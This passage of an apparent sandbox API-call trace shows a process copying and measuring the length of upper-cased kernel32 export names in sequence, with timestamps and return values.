lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.031] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.031] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.031] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.031] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.031] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.032] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.032] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.032] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.032] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.032] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.032] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.032] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.032] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.032] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.032] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.032] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.032] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.032] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.032] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.032] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.032] lstrlenA (lpString="BEEP") returned 4 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.032] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.032] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.032] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.033] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.033] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.033] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.033] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.033] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.033] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.033] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.033] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.033] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.033] lstrlenA (lpString="CANCELIO") returned 8 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.033] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.033] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.033] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.033] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.033] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.033] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.033] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.033] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.033] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.034] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.034] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.034] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.034] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.034] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.034] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.034] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.034] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.034] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.034] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.034] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.034] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.034] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.034] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.034] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.034] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.034] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.034] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.034] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.034] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.035] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.035] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.035] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.035] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.035] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.035] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.035] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.035] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.035] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.035] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.035] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.035] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.035] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.035] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.035] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.035] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.035] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.035] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.035] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.036] lstrlenA (lpString="COPYFILEA") returned 9 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.036] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.036] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.036] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.036] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.036] lstrlenA (lpString="COPYFILEW") returned 9 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.036] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.036] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.036] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.036] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.036] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.036] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.036] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.036] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.036] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.036] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.036] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.036] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.036] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.036] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.037] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.037] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.037] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.037] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.037] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.037] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.037] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.037] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.037] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.037] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.037] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.037] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.037] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.037] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.037] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.037] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.037] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.037] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.037] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.037] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.038] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.038] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.038] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.038] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.038] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.038] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.038] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.038] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.038] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.038] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.038] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, 